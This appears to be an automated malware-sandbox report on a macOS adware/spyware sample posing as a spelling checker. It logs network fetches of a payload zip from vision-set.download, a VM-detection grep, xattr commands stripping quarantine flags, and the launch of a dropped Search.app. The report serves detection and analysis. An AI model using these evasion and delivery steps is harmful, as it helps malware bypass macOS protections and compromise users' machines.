Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 03 Oct 2018 12:12:21 GMTContent-Type: application/zipContent-Length: 53113Last-Modified: Tue, 25 Sep 2018 17:08:06 GMTConnection: keep-aliveETag: "5baa6b76-cf79"Accept-Ranges: bytesData Raw: 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 |
Source: global traffic | HTTP traffic detected: GET /hello.txt HTTP/1.1Host: vision-set.downloadAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64) |
Source: global traffic | HTTP traffic detected: GET /hello.txt HTTP/1.1Host: vision-set.downloadAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64) |
Source: global traffic | HTTP traffic detected: GET /readautoip.php?prefix=upd: HTTP/1.1Host: rs64nrl.infoAccept: */*Accept-Language: en-usConnection: keep-aliveAccept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64) |
Source: global traffic | HTTP traffic detected: GET /files/cmdse.txt HTTP/1.1Host: vision-set.downloadAccept: */*Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /files/Search.zip HTTP/1.1Host: vision-set.downloadAccept: */*Cookie: PHPSESSID=fc4m3g6a5jd0bl2j4t3muq3a73User-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64)Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: keep-alive |
Source: unknown | DNS traffic detected: queries for: vision-set.download |
Source: unknown | HTTP traffic detected: POST /api/event/ping.php HTTP/1.1Host: vision-set.downloadContent-Type: text/plainConnection: keep-aliveX-Sig: 9d367d4a3ad24b5a591135355f3e9c86Accept: */*Accept-Language: en-usContent-Length: 664Accept-Encoding: gzip, deflateUser-Agent: SpellingChecker/22 CFNetwork/893.13.1 Darwin/17.3.0 (x86_64) |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.9.15Date: Wed, 03 Oct 2018 12:12:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveAccess-Control-Allow-Origin: *Content-Encoding: gzipData Raw: 32 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 4e ad 54 c8 cb 2f 51 48 cb 2f cd 4b 51 04 00 c6 30 55 ce 0e 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 22NT/QH/KQ0U0 |
Source: /bin/sh (PID: 725) | Defaults executable reading com.apple.Safari Preferences: /usr/bin/defaults | Jump to behavior |
Source: classification engine | Classification label: mal72.adwa.spyw.evad.macAPP@0/8@2/0 |
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit |
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit |
Source: /usr/bin/unzip (PID: 718) | Permissions modified for written 64-bit Mach-O /private/tmp/Search.app/Contents/MacOS/Search: bits: - usr: rx grp: rx all: rwx | Jump to dropped file |
Source: /usr/bin/unzip (PID: 718) | Bundle Info.plist file created: Search.app/Contents/Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 718) | Bundle code signature resource file created: Search.app/Contents/_CodeSignature/CodeResources | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Hidden file created: /tmp/.dat.nosync02c6.3NY2ts | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Shell command executed: /bin/sh -c ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Shell command executed: /bin/sh -c cd /tmp/ /usr/bin/unzip -o /tmp/ot4860.zip | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | Shell command executed: /bin/sh -c /bin/sh -c 'defaults read com.apple.Safari \'NSWindow Frame Preferences\' > /tmp/b.txt ' & | Jump to behavior |
Source: /bin/sh (PID: 724) | Shell command executed: /bin/sh -c defaults read com.apple.Safari 'NSWindow Frame Preferences' > /tmp/b.txt | Jump to behavior |
Source: /bin/sh (PID: 713) | Grep executable: /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Application opened: /usr/bin/open /tmp/Search.app | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist | Jump to behavior |
Source: /usr/bin/open (PID: 721) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zip | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist | Jump to behavior |
Source: /usr/bin/unzip (PID: 718) | File written: /private/tmp/Search.app/Contents/MacOS/Search | Jump to dropped file |
Source: /usr/bin/unzip (PID: 718) | 64-bit Mach-O written to tmp path: /private/tmp/Search.app/Contents/MacOS/Search | Jump to dropped file |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | ZIP file created: /private/tmp/.dat.nosync02c6.3NY2ts | Jump to dropped file |
Source: Submitted file: iWk7svKGhJ.app | CodeResources XML file: CodeResources |
Source: Submitted file: iWk7svKGhJ.app | CodeResources XML file: CodeResources |
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.dr | CodeResources XML file: CodeResources |
Source: Submitted file: .dat.nosync02c6.3NY2ts.266.dr | CodeResources XML file: CodeResources |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715) | Random device file read: /dev/urandom | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716) | Random device file read: /dev/urandom | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719) | Random device file read: /dev/urandom | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720) | Random device file read: /dev/urandom | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist | Jump to behavior |
Source: /usr/bin/xattr (PID: 715) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python | Jump to behavior |
Source: /usr/bin/xattr (PID: 716) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python | Jump to behavior |
Source: /usr/bin/xattr (PID: 719) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python | Jump to behavior |
Source: /usr/bin/xattr (PID: 720) | Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python | Jump to behavior |
Source: /usr/bin/unzip (PID: 718) | XML plist file created: /private/tmp/Search.app/Contents/_CodeSignature/CodeResources | Jump to dropped file |
Source: /usr/bin/unzip (PID: 718) | Binary plist file created: /private/tmp/Search.app/Contents/Resources/Base.lproj/MainMenu.nib | Jump to dropped file |
Source: /usr/bin/unzip (PID: 718) | XML plist file created: /private/tmp/Search.app/Contents/Info.plist | Jump to dropped file |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Xattr command executed: /usr/bin/xattr -d -r com.apple.metadata:kMDItemWhereFroms /tmp/ot4860.zip | Jump to behavior |
Source: /bin/sh (PID: 713) | Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels | Jump to behavior |
Source: /bin/sh (PID: 713) | Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels | Jump to behavior |
Source: /bin/sh (PID: 713) | Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels | Jump to behavior |
Source: /bin/sh (PID: 713) | Grep searching for VM related keyword(s): /usr/bin/grep -> grep -e VirtualBox -e Oracle -e VMware -e Parallels | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Xattr command executed: /usr/bin/xattr -d -r com.apple.quarantine /tmp/ot4860.zip | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | Sysctl read request: kern.safeboot (1.66) | Jump to behavior |
Source: /bin/sh (PID: 712) | IOreg executable: /usr/sbin/ioreg -> ioreg -l | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | Sysctl read request: hw.availcpu (6.25) | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Sysctl requested: kern.ostype (1.1) | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | Sysctl requested: kern.osrelease (1.2) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715) | Sysctl requested: kern.ostype (1.1) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715) | Sysctl requested: kern.osrelease (1.2) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716) | Sysctl requested: kern.ostype (1.1) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716) | Sysctl requested: kern.osrelease (1.2) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719) | Sysctl requested: kern.ostype (1.1) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719) | Sysctl requested: kern.osrelease (1.2) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720) | Sysctl requested: kern.ostype (1.1) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720) | Sysctl requested: kern.osrelease (1.2) | Jump to behavior |
Source: /bin/sh (PID: 711) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 717) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 723) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /bin/sh (PID: 724) | Sysctl requested: kern.hostname (1.10) | Jump to behavior |
Source: /Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker (PID: 710) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 715) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 716) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 719) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 720) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /usr/bin/open (PID: 721) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /private/tmp/Search.app/Contents/MacOS/Search (PID: 722) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist | Jump to behavior |
Source: /bin/sh (PID: 725) | Defaults executable: /usr/bin/defaults -> defaults read com.apple.Safari NSWindow Frame Preferences | Jump to behavior |